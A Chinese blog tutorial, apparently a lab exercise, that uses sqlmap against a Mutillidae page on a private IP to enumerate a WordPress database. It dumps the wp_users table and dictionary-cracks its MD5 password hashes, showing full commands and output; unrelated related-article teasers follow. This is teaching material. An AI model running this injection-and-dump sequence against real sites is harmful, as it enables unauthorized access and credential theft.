SQLmap 注入-03 获得用户信息

news2025/1/23 9:07:26

1: Sqlmap 先进入库,然后进入table, 然后列出column:

sqlmap -u "http://192.168.56.133/mutillidae/index.php?page=user-info.php&username=xiaosheng&password=abc&user-info-php-submit-button=View+Account+Details" --batch -p username -D wordpress --tables

看一下执行结果:

[06:43:34] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14, PHP

back-end DBMS: MySQL >= 5.0

[06:43:34] [INFO] fetching tables for database: 'wordpress'

[06:43:36] [WARNING] reflective value(s) found and filtering out

Database: wordpress

[14 tables]

+-------------------+

| wp_categories     |

| wp_comments       |

| wp_linkcategories |

| wp_links          |

| wp_mygallery      |

| wp_mygprelation   |

| wp_mypictures     |

| wp_options        |

| wp_post2cat       |

| wp_postmeta       |

| wp_posts          |

| wp_spreadsheet    |

| wp_usermeta       |

| wp_users          |

+-------------------+

[06:43:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'

[06:43:38] [WARNING] your sqlmap version is outdated

[*] ending @ 06:43:38 /2025-01-21/

下面进一步列出表的信息:

sqlmap -u "http://192.168.56.133/mutillidae/index.php?page=user-info.php&username=xiaosheng&password=abc&user-info-php-submit-button=View+Account+Details" --batch -p username -D wordpress -T wp_users -columns

[06:47:03] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: Apache 2.2.14, PHP, PHP 5.3.2

back-end DBMS: MySQL >= 5.0

[06:47:03] [INFO] fetching columns for table 'wp_users' in database 'wordpress'

[06:47:05] [WARNING] reflective value(s) found and filtering out

Database: wordpress

Table: wp_users

[10 columns]

+---------------------+---------------------+

| Column              | Type                |

+---------------------+---------------------+

| display_name        | varchar(250)        |

| ID                  | bigint(20) unsigned |

| user_activation_key | varchar(60)         |

| user_email          | varchar(100)        |

| user_login          | varchar(60)         |

| user_nicename       | varchar(50)         |

| user_pass           | varchar(64)         |

| user_registered     | datetime            |

| user_status         | int(11)             |

| user_url            | varchar(100)        |

+---------------------+---------------------+

[06:47:06] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'

[06:47:06] [WARNING] your sqlmap version is outdated

[*] ending @ 06:47:06 /2025-01-21/

3: 下面知道某个表的信息后,那么就要把里面的数据dump 下来,要用dump-all:

┌──(root㉿kali)-[~]

└─# sqlmap -u "http://192.168.56.133/mutillidae/index.php?page=user-info.php&username=xiaosheng&password=abc&user-info-php-submit-button=View+Account+Details" --batch -p username -D wordpress -T wp_users -dump  

   ---

下面是输出结果:

[06:52:58] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14, PHP

back-end DBMS: MySQL >= 5.0

[06:52:58] [INFO] fetching columns for table 'wp_users' in database 'wordpress'

[06:52:59] [WARNING] reflective value(s) found and filtering out

[06:52:59] [INFO] fetching entries for table 'wp_users' in database 'wordpress'

[06:53:02] [INFO] recognized possible password hashes in columns 'user_pass, user_activation_key'

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N

do you want to crack them via a dictionary-based attack? [Y/n/q] Y

[06:53:02] [INFO] using hash method 'md5_generic_passwd'

what dictionary do you want to use?

[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)

[2] custom dictionary file

[3] file with list of dictionary files

> 1

[06:53:02] [INFO] using default dictionary

do you want to use common password suffixes? (slow!) [y/N] N

[06:53:02] [INFO] starting dictionary-based cracking (md5_generic_passwd)

[06:53:02] [INFO] starting 4 processes

[06:53:07] [INFO] cracked password 'admin' for user 'admin'                                                       

[06:53:14] [INFO] cracked password 'user' for user 'user'                                                         

[06:53:14] [INFO] cracked password 'admin' for user 'admin'                                                       

[06:53:16] [INFO] cracked password 'user' for user 'user'                                                         

Database: wordpress                                                                                               

Table: wp_users

[2 entries]

+----+----------+------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+----------------------------------+

| ID | user_url | user_pass                                | user_email        | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key              |

+----+----------+------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+----------------------------------+

| 1  | http://  | 21232f297a57a5a743894a0e4a801fc3 (admin) | admin@example.org | admin      | 0           | admin        | admin         | 2009-09-14 21:04:44 | 21b6b8fcdfc2330f329e9c3807bb6d53 |

| 2  | <blank>  | ee11cbb19052e40b07aac0ca060c23ee (user)  | user@example.org  | user       | 0           | user         | user          | 2009-11-09 04:05:33 | <blank>                          |

+----+----------+------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+----------------------------------+

[06:53:21] [INFO] table 'wordpress.wp_users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.56.133/dump/wordpress/wp_users.csv'                           

[06:53:21] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'

[06:53:21] [WARNING] your sqlmap version is outdated

--

4下面获得数据库的 信息:

 sqlmap -u "http://192.168.56.133/mutillidae/index.php?page=user-info.php&username=xiaosheng&password=abc&user-info-php-submit-button=View+Account+Details" --batch -p username -D wordpress -T wp_users -C 'user_login,user_pass' --dump

[07:03:41] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14, PHP

back-end DBMS: MySQL >= 5.0

[07:03:41] [INFO] fetching entries of column(s) 'user_login,user_pass' for table 'wp_users' in database 'wordpress'

[07:03:43] [WARNING] reflective value(s) found and filtering out

[07:03:44] [INFO] recognized possible password hashes in column 'user_pass'

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N

do you want to crack them via a dictionary-based attack? [Y/n/q] Y

[07:03:44] [INFO] using hash method 'md5_generic_passwd'

[07:03:44] [INFO] resuming password 'admin' for hash '21232f297a57a5a743894a0e4a801fc3' for user 'admin'

[07:03:44] [INFO] resuming password 'user' for hash 'ee11cbb19052e40b07aac0ca060c23ee' for user 'user'

Database: wordpress

Table: wp_users

[2 entries]

+------------+------------------------------------------+

| user_login | user_pass                                |

+------------+------------------------------------------+

| admin      | 21232f297a57a5a743894a0e4a801fc3 (admin) |

| user       | ee11cbb19052e40b07aac0ca060c23ee (user)  |

+------------+------------------------------------------+

[07:03:44] [INFO] table 'wordpress.wp_users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.56.133/dump/wordpress/wp_users.csv'                                                                                          

[07:03:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'

[07:03:44] [WARNING] your sqlmap version is outdated

[*] ending @ 07:03:44 /2025-01-21/

上面可以看出: 得到了用户的认证信息

参考文献: 16.SQL注入攻击_哔哩哔哩_bilibili

                                                                                                                   

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2280162.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

map和set的使用(一)详解

文章目录 序列式容器和关联式容器map和set的介绍set构造和迭代器遍历和insertfinderaseswapclearcountlower_bound和upper_boundmultiset和set的对比 set的二个题目题目解析算法原理代码介绍一个找差集的算法同步算法题目解析算法原理代码 map构造遍历initiaizer_list 序列式容…

CSS布局与响应式

学习链接 Grid网格布局 前端五大主流网页布局 flex布局看这一篇就够了 grid布局看这一篇就够了 用六个案例学会响应式布局 伸缩盒响应式页面布局实战 实现响应式布局的五种方式 - csdn 如何完成响应式布局&#xff0c;有几种方法&#xff1f;看这个就够了 响应式布局总…

P6周:VGG-16算法-Pytorch实现人脸识别

&#x1f368; 本文为&#x1f517;365天深度学习训练营中的学习记录博客&#x1f356; 原作者&#xff1a;K同学啊 我的环境 语言环境&#xff1a;Python 3.8.12 编译器&#xff1a;jupyter notebook 深度学习环境&#xff1a;torch 1.12.0cu113 一、前期准备 1.设置GPU im…

Git:问题解决办法 及 Tips 总结

目录 查看历史记录及比较区别查看所有提交的历史记录查看提交的详细历史记录查看提交之间的差异点击文件操作历史&#xff0c;筛选出所有改动过此文件的提交任意两个提交之间的比较&#xff08;开发及查BUG常用&#xff09; 在需要版本回滚的情况下处理方法短时间内无法彻查BUG…

【优选算法】----移动零

好久没写博客的兄弟姐妹们~ 今天来写一篇算法过过水吧~ --------------------------------------begin---------------------------------------- 题目要求&#xff1a; 给的难度是简单哦 题目解析&#xff1a; 这道题的思路可以借助双指针的思想&#xff0c;定义dest和c…

Solana 套利机器人原理

引言 加密货币的交易世界中&#xff0c;套利是利用市场价格差异进行无风险获利的一种策略。随着 DeFi&#xff08;去中心化金融&#xff09;的快速发展&#xff0c;套利机会屡见不鲜&#xff0c;尤其是在高速、高效能的区块链上&#xff0c;如 Solana。这些区块链通过提供低交易…

springboot自动配置原理(高低版本比较)spring.factories文件的作用

SpringBootApplication public class SpringSecurityApplication {public static void main(String[] args) {SpringApplication.run(SpringSecurityApplication.class, args);}}注解SpringBootApplication Target({ElementType.TYPE}) Retention(RetentionPolicy.RUNTIME) Doc…

总结4..

#include <stdio.h> // 定义全局变量n&#xff0c;用于表示二维数组的大小 // 定义二维数组b&#xff0c;用于标记找到单词的位置&#xff0c;初始化为0 int n, b[200][200] {0}; // 定义二维数组d&#xff0c;存储8个方向的偏移量&#xff0c;用于在二维数组中搜索…

从零开始:Spring Boot核心概念与架构解析

引言 在当今的Java开发领域&#xff0c;Spring Boot已经成为构建企业级应用的首选框架之一。它以其简洁、高效、易于上手的特点&#xff0c;极大地简化了Spring应用的开发过程。本文将从Spring Boot的核心概念入手&#xff0c;深入解析其架构设计和运行原理&#xff0c;帮助读…

深入 Flutter 和 Compose 的 PlatformView 实现对比,它们是如何接入平台控件

在上一篇《深入 Flutter 和 Compose 在 UI 渲染刷新时 Diff 实现对比》发布之后&#xff0c;收到了大佬的“催稿”&#xff0c;想了解下 Flutter 和 Compose 在 PlatformView 实现上的对比&#xff0c;恰好过去写过不少 Flutter 上对于 PlatformView 的实现&#xff0c;这次恰好…

无人机飞手考证难度增加,实操、地面站教学技术详解

随着无人机技术的快速发展和广泛应用&#xff0c;无人机飞手考证的难度确实在不断增加。这主要体现在对飞手的实操技能和地面站操作技术的要求上。以下是对无人机飞手考证中实操和地面站教学技术的详细解析&#xff1a; 一、实操教学技术详解 1. 无人机基础知识学习&#xff1…

linux下springboot项目nohup日志或tomcat日志切割处理方案

目录 1. 配置流程 2. 配置说明 其他配置选项&#xff1a; 3. 测试执行 4. 手动执行 https://juejin.cn/post/7081890486453010469 通常情况下&#xff0c;我们的springboot项目部署到linux服务器中&#xff0c;通过nohup java -jar xxx.jar &指令来进行后台运行我们…

知识图谱可视化:揭示隐藏的模式与关系

目录 前言1. 什么是知识图谱可视化1.1 知识图谱概述1.2 知识图谱可视化的定义 2. 知识图谱可视化的意义2.1 降低理解门槛2.2 帮助发现模式与洞察2.3 提升交互性与用户体验 3. 知识图谱可视化的技术实现3.1 数据处理与准备3.2 可视化技术3.3 用户交互设计 4. 知识图谱可视化的应…

深度学习基础--LSTM学习笔记(李沐《动手学习深度学习》)

前言 LSTM是RNN模型的升级版&#xff0c;神经网络模型较为复杂&#xff0c;这里是学习笔记的记录&#xff1b;LSTM比较复杂&#xff0c;可以先看&#xff1a; 深度学习基础–一文搞懂RNN 深度学习基础–GRU学习笔记(李沐《动手学习深度学习》) RNN&#xff1a;RNN讲解参考&am…

电气防火保护器为高校学生宿舍提供安全保障

摘 要&#xff1a;3月2日&#xff0c;清华大学紫荆学生公寓发生火情&#xff0c;无人员伤亡。推断起火原因系中厅内通电电器发生故障引燃周边可燃物所致。2月27日&#xff0c;贵州某高校女生宿舍发生火灾&#xff0c;现场明火得到有效控制&#xff0c;无人员受伤。2月19日&…

每打开一个chrome页面都会【自动打开F12开发者模式】,原因是 使用HBuilderX会影响谷歌浏览器的浏览模式

打开 HBuilderX&#xff0c;点击 运行 -> 运行到浏览器 -> 设置web服务器 -> 添加chrome浏览器安装路径 chrome谷歌浏览器插件 B站视频下载助手插件&#xff1a; 参考地址&#xff1a;Chrome插件 - B站下载助手&#xff08;轻松下载bilibili哔哩哔哩视频&#xff09…

C#使用WMI获取控制面板中安装的所有程序列表

C#使用WMI获取控制面板中安装的所有程序列表 WMI 全称Windows Management Instrumentation,Windows Management Instrumentation是Windows中用于提供共同的界面和对象模式以便访问有关操作系统、设备、应用程序和服务的管理信息。如果此服务被终止&#xff0c;多数基于 Windo…

企业级流程架构设计思路-基于价值链的流程架构

获取更多企业流程资料 纸上得来终觉浅&#xff0c;绝知此事要躬行 一.企业流程分级规则定义 1.流程分类分级的总体原则 2.完整的流程体系需要体现出流程的分类分级 03.通用的流程分级方法 04.流程分级的标准 二.企业流程架构设计原则 1.流程架构设计原则 流程框架是流程体…

PyTorch使用教程(8)-一文了解torchvision

一、什么是torchvision torchvision提供了丰富的功能&#xff0c;主要包括数据集、模型、转换工具和实用方法四大模块。数据集模块内置了多种广泛使用的图像和视频数据集&#xff0c;如ImageNet、CIFAR-10、MNIST等&#xff0c;方便开发者进行训练和评估。模型模块封装了大量经…

如何将自己本地项目开源到github上?

环境&#xff1a; LLMB项目 问题描述&#xff1a; 如何将自己本地项目开源到github上&#xff1f; 解决方案&#xff1a; 步骤 1: 准备本地项目 确保项目整洁 确认所有的文件都在合适的位置&#xff0c;并且项目的 README.md 文件已经完善。检查是否有敏感信息&#xff0…